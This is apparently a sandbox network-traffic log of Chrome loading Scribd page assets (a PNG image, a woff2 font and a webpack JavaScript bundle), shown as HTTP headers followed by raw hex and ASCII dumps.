                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fe 00 00 01 68 08 06 00 00 00 b6 50 99 7b 00 00 74 f6 49 44 41 54 78 da ec 9d 6b 6c 14 65 14 86 0f 28 dd 45 40 8b 80 28 92 60 15 d3 02 21 40 04 bc 05 88 26 44 71 bb 65 67 96 89 20 10 11 09 48 4d 11 fc 41 10 7f b0 0a ca 2e 25 20 c6 2a 30 33 bb 50 41 66 a6 17 52 2f 28 89 11 fd 23 31 29 1a 2f 11 35 1a 6f 51 d0 44 01 45 8d 08 8c e7 03 43 4b 77 bb ee 2e 65 77 ba df fb 24 6f 26 69 48 cb 8f ef 9c 77 cf d9 f3 9d 21 00 00 00 20 9f cc ad df db 47 31 9d 5b 43 ba b3 58 31 ed 4d 8a 6e ef 08 19 f6 6b fc dc cf cf cf f8 f9 93 62 d8 7f 87 0c eb 30 3f df e3 e7 4e fe b7 0b c3 f1 a6 eb 09 00 00 00 00 de 25 e2 ba 3d 67 c4 1b 6e 53 4d 7b a5 62 58 0e eb 0b 36 f7 d3 21 dd 72 73 91 62 d8 1f 2b a6 fd f0 ec 1d 7b 2e 27 00 ba
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRhP{tIDATxkle(E@(`!@&Dqeg HMA.% *03PAfR/(#1)/5oQDECKw.ew$o&iHw! G1[CX1Mnkb0?N%=gnSM{bX6!rsb+{.'
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: d9 df 62 c5 75 81 58 e7 ab ba 5b 7a 33 cf 46 be ca 16 02 49 a8 3b 9a 86 62 92 3f 59 e3 22 b5 6e bf 79 8b dd 81 8b 96 ba d3 b7 5a d5 04 a4 40 35 ac 45 b2 9f fd 8c 14 b7 b1 19 b5 10 f0 d0 da eb d2 9b 79 56 aa 3c 55 eb 0f e2 55 93 1d 50 74 67 85 f4 49 ac 83 26 ae d9 20 4c ff 9c 6e 8f d6 7d 42 a0 e8 99 a5 b7 0c e6 ee d7 31 d9 cf 7f 66 b2 5b 09 e4 97 98 af aa 9c ef a8 9f 86 99 67 a7 a8 2f b8 91 c0 79 88 00 46 12 6b d3 98 55 31 61 f6 e7 a9 7c f9 13 ae e8 8c 10 28 f6 29 fe cd b2 9f ff 6c 14 36 1a c7 11 c8 1f 6c 60 cf cb 6e e2 39 2e f4 39 5a 37 48 eb 4b e0 0c 73 eb f7 f6 19 bf 7a 03 da fc ac e9 3c c8 57 b1 62 b5 30 fa 24 f5 7f b0 c6 ad da fc d2 1c 02 45 8b 56 ef 94 89 dd 0d b2 c7 01 96 5c 79 94 8d a5 a1 52 36 b0 e3 b2 9b 78 ae e2 9b 10 4b 08 9c 61 ea a6 c4 3d fd
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: buX[z3FI;b?Y"nyZ@5EyV<UUPtgI& Ln}B1f[g/yFkU1a|()l6l`n9.9Z7HKsz<Wb0$EV\yR6xKa=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: f3 6c 26 65 b3 88 bf 41 d5 c9 b9 27 a2 0c 5c a3 af e6 33 a0 c3 f2 b6 03 e1 de fd 07 b0 b5 a8 18 14 e9 eb 61 b8 4f c8 73 27 fa 3e 32 5f 98 9a 90 0c 99 07 7e 82 8a 3b 55 40 38 72 f9 2a d9 4b c0 73 a9 3f f4 33 c4 10 1d 58 58 92 a6 7b 4c da 38 3b 25 af 7f 6e 84 ff 79 7a 36 e4 15 97 c2 23 b5 1a b4 a1 6e 6c 84 dc 13 25 f0 d9 ea 6c 5d 0f ae 22 7b 6d 74 db bf 23 95 55 b0 73 50 0c 9f ed db e3 da 7d 35 93 b2 99 a2 83 e3 3c 44 19 76 32 9f 6a 5e a5 7b 72 5f 68 78 ac 86 d6 54 d5 d5 c3 be 92 52 58 b4 75 27 38 c7 af 84 61 73 82 05 b3 2a d0 4f e1 07 ff 89 89 87 b0 ec 7c d8 72 fc 04 94 df be 03 da 18 bb 70 11 ef 6b f6 90 79 0f 46 0c d1 d1 dd 45 d1 bb d9 7d 26 0d 9f 9a ca 53 05 1d ae eb f2 e1 6a f5 3d e0 c3 f5 9a 5a f0 cf df c5 f7 1c 0b b2 b9 56 af 71 67 e3 2a 1f 8b 18 fa
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l&eA'\3aOs'>2_~;U@8r*Ks?3XX{L8;%nyz6#nl%l]"{mt#UsP}5<Dv2j^{r_hxTRXu'8as*O|rpkyFE}&Sj=ZVqg*
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 26 0d da 98 03 4f 58 83 18 b4 2d f9 67 93 cf c0 e8 d0 05 20 24 aa ee 3f 20 25 7e 06 35 f2 29 bd 56 69 9e f6 d9 52 59 0e 62 68 27 c6 c2 69 12 ed 92 15 64 58 4a 76 8a 5c fc 19 f0 84 65 bb f6 b5 39 80 77 9f 2e 05 31 d2 ad 1d f1 93 4e 82 4f a8 62 07 90 d0 85 b5 9b 5b 17 2c ae ab e4 73 70 ec d2 15 10 12 9b 4f 9d 23 e2 e7 fa ef eb 43 f2 6e 6e bc 9b 23 d4 9d 67 c8 87 22 86 d6 da fd 42 ea 25 2b c0 20 15 16 71 16 8e 2f 8b 58 fc 45 d0 8c fe 6d 74 b1 3b 80 5b ec 8a 91 1e b3 bc 9e b6 31 49 d3 4a fc 84 3e 88 41 15 36 d3 15 1f 10 79 cd 48 4e 07 21 41 2a 04 bc 72 77 70 f2 af b8 5b 03 ba f2 45 62 b2 39 0f cd da 84 18 2d 51 75 9a 38 92 76 c1 0a 7c d6 bf 52 c4 e2 af 83 66 2c da b6 5b fb 99 fc 32 5f 10 2b d3 53 d7 6a 7d cf 23 fc c2 b9 7f a3 f2 5a 88 9f e5 2b 29 04 3f 04 7a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &OX-g $? %~5)ViRYbh'idXJv\e9w.1NOb[,spO#Cnn#g"B%+ q/XEmt;[1IJ>A6yHN!A*rwp[Eb9-Qu8v|Rf,[2_+Sj}#Z+)?z
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 12 69 0c 3f 06 30 6c ec 43 43 4d 69 91 ab c2 17 63 84 45 ca b3 5d 22 5d 64 f8 8a b5 ec 1a 75 56 2c 5e a2 9e 6f c0 1b 44 db 48 1c ef b0 67 54 6d 49 a4 d7 34 b0 da f7 f4 17 bb 69 1a 48 90 df 05 fd 7a 53 b9 f4 a3 03 ff 37 45 03 bb df 70 3f 70 e4 d9 7b ee 62 e9 8b 29 6c d7 3e ac da bc 5d dd 17 46 09 9d 60 ed a4 f7 bd 39 e1 18 6a cb de e4 b2 06 d6 63 5e 84 4e a5 f8 b1 9c fe f5 df 27 e8 ae e9 cb 47 f9 9f 66 41 93 44 4b b0 55 bb 20 d3 67 62 3b 79 d5 25 dc 78 40 92 d8 4d d3 50 14 69 32 c0 8d e8 3a 12 e7 36 44 22 fd 5e d9 c0 7e 45 22 45 4a 15 2d 47 4b 44 b6 ea 3f 94 78 09 e3 d6 6d c6 ca 6f 8f c9 fa 96 b7 70 f7 80 c0 d5 42 01 d5 0a 22 69 d7 80 70 0c 0a d6 71 ae bc 81 4d 8e de 01 5d 61 fd e9 0b 70 98 28 8b cf d1 0b d1 80 c9 cf b4 b7 f0 71 1e 25 dc f8 1d 7d 48 75 88
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: i?0lCCMicE]"]duV,^oDHgTmI4iHzS7Ep?p{b)l>]F`9jc^N'GfADKU gb;y%x@MPi2:6D"^~E"EJ-GKD?xmopB"ipqM]ap(q%}Hu
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 73 16 c2 ca 77 42 cd d6 f2 97 b8 74 16 9e bf 2f 9d 4b 38 dc f8 35 0d 3d c7 77 17 bb c1 71 29 96 9b d5 db 2f 5e 3e 67 49 63 c7 f6 e4 25 b3 a2 79 b0 f1 e7 26 5e a3 68 dc c9 19 76 3d 2c f6 84 70 2a 60 e9 1b 38 59 55 13 63 69 7e e7 6f dc c2 cb e0 d2 5f 0f d1 7d d9 7a ad 99 fd 98 d5 1b d8 44 46 d6 c5 b2 32 72 f3 9e e2 97 5f af 20 ee bb 13 45 6d fc 43 37 58 8e f0 3b 4d ff 7f 81 80 f3 fe 4e c2 8d df e9 d3 6a 54 ec eb 4d 38 dc f8 35 0d 4b e1 12 bb c1 71 29 56 eb d7 db 97 7d 76 8a 89 44 ba 99 d8 b5 b4 d7 fa 98 b4 f4 6c 40 27 a4 8b 68 70 e1 a3 72 c1 86 7f c4 79 7b d7 26 1c 39 e8 8a 74 94 3a 26 e6 10 f4 09 ae df 7b 00 6d f3 d3 cd db e8 1c b1 4a a3 86 df c8 7f 12 3e db b9 17 e9 d9 39 50 c4 83 d4 34 ac dc f4 15 86 d2 7f e7 e8 f6 0e 5e b1 73 aa 58 25 b4 59 4b 98 f6 19
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: swBt/K85=wq)/^>gIc%y&^hv=,p*`8YUci~o_}zDF2r_ EmC7X;MNjTM85Kq)V}vDl@'hpry{&9t:&{mJ>9P4^sX%YK
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 5e 6b 1d e7 b7 5e c4 b6 f8 56 91 bf bf 42 f0 f3 c3 8e 13 38 35 6b fc 59 5f bf 35 38 23 a6 7d 06 33 fc b2 ca a4 13 81 9c 38 d7 46 44 9f b0 93 7e 5c fe 9e b8 d6 77 15 bd d1 71 c9 8b 4d 06 ab df 62 59 ba 55 13 e6 4f bb 40 1e ad e4 ac 3f 96 70 64 30 53 57 21 60 6e c7 f3 49 42 e0 a5 aa 8a e4 5c a4 a6 ab 0e f9 85 85 f8 e2 c8 71 38 4c f8 44 f6 3d 3a d2 d5 7e e3 89 d3 54 36 fe 8d 27 7e 44 59 ae 5c 4f 81 6d 6b b7 d2 b1 64 f6 46 2b ac 8f d9 05 6d 10 7b 25 45 ce fc ed ff 8e f8 af e3 d2 41 e1 b5 be fa 4f fa e0 0d a5 19 2d 12 e9 45 81 93 e6 74 d9 6e 02 e7 ff ec 9d 09 5c 13 57 1e c7 9f 5a b9 44 4e a5 10 10 51 b4 04 a2 20 ca 21 d6 03 f1 a0 08 91 5e 58 ab 56 25 60 ba 24 1c a5 b6 78 55 97 ba d6 7a ad ae 76 b5 b6 b5 b6 ab e2 81 ad 56 b1 b5 2b 56 b1 ba 4a 17 b5 96 aa 58 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^k^VB85kY_58#}38FD~\wqMbYUO@?pd0SW!`nIB\q8LD=:~T6'~DY\OmkdF+m{%EAO-Etn\WZDNQ !^XV%`$xUzvV+VJXi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: a7 3b ab 66 34 c2 5a 14 fc 31 af 40 1f 87 a4 54 03 49 7e 75 6b 3c 26 bb 00 0c e5 96 9e 19 cb 5c c9 af b8 d3 55 a9 f4 6c 73 7c 9a 72 38 87 19 ff 4a fa ee 01 45 a9 59 e0 4f 53 4e d4 39 4f 4d d4 1d 13 03 46 27 c3 da ba 3a 68 2d b5 50 5e 71 fc 8c d1 1c ff 29 5b 8b b4 cb fd 0e b1 49 ea 00 9f d0 a7 19 c6 73 48 b8 ce fd fd 5d 3c 3f 17 2d c0 bf bf 3b 20 b2 85 ed 7c b1 dd a8 a0 9e 9b 46 e0 bf c1 b6 7e 06 21 d1 d4 c0 6b e4 3a e8 5e e8 3a 0c 7b e0 11 ab 8c c6 82 90 d0 a7 17 45 71 d4 4a bf 14 47 6a ff fe 5d e6 fc 7e 69 36 c0 50 68 7f 3e 63 0a 5f 5a c6 b3 cc c7 2b 63 58 83 5a a6 a0 75 a3 43 2b 08 e6 2e f1 2b fe 7d a4 47 fc 92 7f ae eb d4 b3 9f b6 e8 d8 3f 22 16 5e bb 7e 03 5a 53 db cf fe cc aa 8b 9f 67 e4 28 f5 2e 83 7e 83 35 c9 7d d1 0c 33 75 f1 f3 3a 71 e8 37 79 56
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;f4Z1@TI~uk<&\Uls|r8JEYOSN9OMF':h-P^q)[IsH]<?-; |F~!k:^:{EqJGj]~i6Ph>c_Z+cXZuC+.+}G?"^~ZSg(.~5}3u:q7yV
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 5a 16 9b b1 db c8 73 dc ef 07 44 04 fc ac 04 61 07 d4 1c c2 92 27 5d 79 97 38 ec c1 87 bb 5f 72 1e de de e0 7f 00 7c c5 9e dc f2 fb 13 ff 63 60 d6 bf 11 10 31 80 5f a9 34 52 d4 37 84 45 1b 60 6f 86 78 e0 2b fa 8f 3d 99 31 13 3a 8a a3 a0 53 ef 30 58 7a ea 0c b4 86 9a 5a 5a 68 ed 75 f9 fa fc ed 7b f0 ad 43 df 69 bf 1f 28 9f 29 e4 76 d6 79 80 88 80 9f 95 7c 83 13 2d 3d 00 27 39 8f c0 1e 7c b8 7b 9c eb 90 f6 05 3f b2 6f f0 7c 4e e0 77 94 4e 32 00 fe fa 95 2e 29 1e 80 88 26 aa fa 7f 36 73 41 5f 46 21 ab d3 6c 6e ae a3 fe 73 07 be b3 6a 8f fe 63 3e 93 d2 61 47 91 18 7e b1 ff 20 b4 86 1e 3e 6e a2 65 ef f3 75 de c1 13 b0 ae a1 91 f6 58 54 d6 5c e1 c6 3b e2 16 11 01 3f cb 2d 7c 25 96 1e 80 e3 5d 86 62 0f 3e dc 3d cc 2d ba fd c1 8f b2 ce 03 62 1d 00 4b a1 0a 7e 54
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ZsDa']y8_r|c`1_4R7E`ox+=1:S0XzZZhu{Ci()vy|-='9|{?o|NwN2.)&6sA_F!lnsjc>aG~ >neuXT\;?-|%]b>=-bK~T
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: b7 fa 47 a9 74 64 f8 ff 57 e0 30 0a f6 9e 2a 57 6d 82 b8 2b 2c 1a e4 40 42 4e 1e 2c f1 0b 91 5c f4 bf 39 13 2c 5e bb 36 4e de 48 d4 fb b8 31 9b f7 c8 21 fc 47 05 0e 2e fc 75 c1 e1 74 50 b7 c1 cb 36 28 b2 c9 4e 6c 35 88 79 01 64 95 7d db d8 9a ab f0 1b 9d 91 ef d2 6c d4 04 1d c2 5f ba b1 e5 b8 17 05 0e 03 45 5f 3d 4d 9b 18 ba 06 86 43 79 79 85 e4 09 7c 1e 71 49 e0 20 71 02 1f 71 6d 60 04 e4 14 97 40 6d fc 66 e0 04 bf 41 8b bf 97 61 5d 5b 7f 2d 70 70 e1 af 0b 76 9e ea 4f 6d aa 1b 48 c8 ce 11 7f 19 c0 bc 00 b2 4a ab bf f6 36 57 e1 bf 20 18 09 d5 60 e7 27 d1 ea 4f d5 91 e1 bf 54 e0 30 20 99 cf ff 4d b4 f6 4b 34 85 70 85 df 45 28 7c 58 24 79 6d fe 3a 19 12 f8 88 07 a2 e2 6a 92 f8 08 15 95 95 b0 27 d2 f0 30 82 cd e7 4e 32 54 ab 74 ed 2b 70 70 e1 af 0b 78 02 76
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GtdW0*Wm+,@BN,\9,^6NH1!G.utP6(Nl5yd}l_E_=MCyy|qI qqm`@mfAa][-ppvOmHJ6W `'OT0 MK4pE(|X$ym:j'0N2Tt+ppxv


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        20192.168.2.1649734151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC579OUTGET /975ow02iyodmurb1/fonts/0000.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: html.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC845INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1966
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: 9SLhpWUxX+B51KTdzAxr6jM97L9sLrYS/2KuOULfnhroEk9qdlvrMVuBgAP5Iye/QRGZb4WhgdU=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: 04VF1EJAJ20FFV8E
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 14:56:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "3207190e0eac228db9e3c7fa8674b9fb"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: inline;filename=0000.woff2
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: uxOucBgsONYHCh6yOF4NJQhrKRqsH1IT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200170-IAD, cache-ewr-kewr1740026-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 67, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522363.526789,VS0,VE165
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC1378INData Raw: 1f 8b 08 08 a0 10 53 67 00 03 30 30 30 30 2e 77 6f 66 66 32 00 01 8c 07 73 f8 77 4f 46 32 00 01 00 00 00 00 07 8c 00 0c 00 00 00 00 0d 10 00 00 07 3c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 60 00 81 18 11 08 0a 92 24 8e 0c 01 36 02 24 03 74 0b 3c 00 04 20 05 81 46 07 20 0c 0a 1b e9 09 51 94 4e 52 0a e0 67 42 26 a7 9f e5 19 ed c8 97 7e 93 d0 63 cb d6 4c ba 92 0f cf df fc 73 ef 4b c3 ab cd 0d 76 d2 e8 06 7e d8 c8 af d6 f2 f7 cd 06 bb 73 51 3e b1 e8 22 d4 21 c8 94 07 9c 89 ec ae 58 04 fe bc fe 17 ec bf 0d 87 49 2c d8 9f 6b b6 84 b3 15 c2 74 fa fb 95 6e 26 58 b4 2d e0 c3 45 8c 4e 8a c4 3f 6b 8b 8b 2d b0 98 58 69 d1 d7 74 73 5e e4 07 08 e7 b7 c8 ee 4c 9c 03 b7 82 d2 be 64 22 b8 00 07 c4 c4 c1 20 f3 78 34 ca 61 ea 41 9c 80 91
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Sg0000.woff2swOF2<`$6$t< F QNRgB&~cLsKv~sQ>"!XI,ktn&X-EN?k-Xits^Ld" x4aA
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC588INData Raw: 5d bb 02 86 53 90 cf 48 33 07 20 1b c6 54 71 fe 8e 50 d7 08 c5 ba 75 19 11 c6 e4 11 d2 10 69 68 bc f4 fc 79 5f ca 2d 2a a0 1b 1a e6 84 f6 3a ad 5e 3b b4 9f 46 3d 19 d2 a6 3a 5f 92 27 9b dc 4b a9 cb 7f e0 4e 44 8d 02 5f b9 8f 4c 5e 7a ea 96 52 75 6a 57 91 de 4f e2 2f 29 44 36 aa c4 62 85 4d 6b 5b a1 dd e1 b2 23 22 63 64 17 2e 6d ca 67 b4 e5 2d 98 81 f6 15 b4 32 39 44 d9 7d 54 60 83 bf 75 4a b1 a5 ce dd 51 b9 ab 80 57 c8 fe dd 54 8d 8e 6f f1 ef 29 6b b0 d4 14 3a 6a 50 3f 06 fd f3 b4 79 1e 95 7a 7b 05 12 ee 70 54 b6 d2 1c 7e 83 eb 28 ed a8 19 15 62 f0 58 18 e5 ce dd 2f 58 fc ee c8 e6 cd d3 fb 56 c7 8e 59 b7 27 5d b5 61 62 38 e5 16 14 a4 e6 0d 00 cb e2 04 5b 7e 8e ad 6f 08 70 52 bb 73 44 12 27 65 63 40 23 6c 58 cc 67 8b 0b 7e 39 e7 db 96 30 36 15 ce 59 39 bf
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]SH3 TqPuihy_-*:^;F=:_'KND_L^zRujWO/)D6bMk[#"cd.mg-29D}T`uJQWTo)k:jP?yz{pT~(bX/XVY']ab8[~opRsD'ec@#lXg~906Y9


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        21192.168.2.1649735151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC374OUTGET /webpack/doc_page/app.d6ad9e.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:23 UTC580INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 375564
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "52a8560347b92a56f62477b5552ed904"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740060-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522363.699884,VS0,VE212
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:23 UTC1378INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 32 34 5d 2c 7b 37 35 38 37 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 72 3d 6e 28 33 38 35 34 34 29 2c 6f 3d 6e 28 36 32 38 33 32 29 2c 73 3d 6e 2e 6e 28 6f 29 2c 61 3d 6e 28 34 30 38 38 30 29 2c 69 3d 6e 28 39 36 35 34 30 29 2c 6c 3d 6e 28 33 30 36 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 7b 63 6f 70 79 72 69 67 68 74 3a 65 2c 68 65 61 64 69 6e 67 4c 65 76 65 6c 3a 74 2c 69 6e 6c 69 6e 65 3a 6e 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[524],{75875:(e,t,n)=>{"use strict";n.d(t,{A:()=>d});var r=n(38544),o=n(62832),s=n.n(o),a=n(40880),i=n(96540),l=n(30686);function c({copyright:e,headingLevel:t,inline:n}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:23 UTC1378INData Raw: 6e 28 22 2c 20 22 29 2c 70 3d 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 6c 65 6e 67 74 68 29 26 26 6e 75 6c 6c 21 3d 3d 74 3b 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 70 3f 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2c 7b 68 65 61 64 69 6e 67 3a 60 24 7b 72 2e 41 2e 74 28 22 64 6f 63 5f 70 61 67 65 2e 6d 65 74 61 64 61 74 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 6f 72 69 67 69 6e 61 6c 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 29 7d 3a 60 2c 74 65 78 74 3a 65 7d 29 3a 6e 75 6c 6c 2c 6e 3f 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2c 7b 68 65 61 64 69 6e 67 3a 72 2e 41 2e 74 28 22 77 65 62 70 61 63 6b 2e 64 6f 63 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n(", "),p=(null===e||void 0===e?void 0:e.length)&&null!==t;return o.createElement(o.Fragment,null,p?o.createElement(c,{heading:`${r.A.t("doc_page.metadata.description.original_description")}:`,text:e}):null,n?o.createElement(c,{heading:r.A.t("webpack.doc_
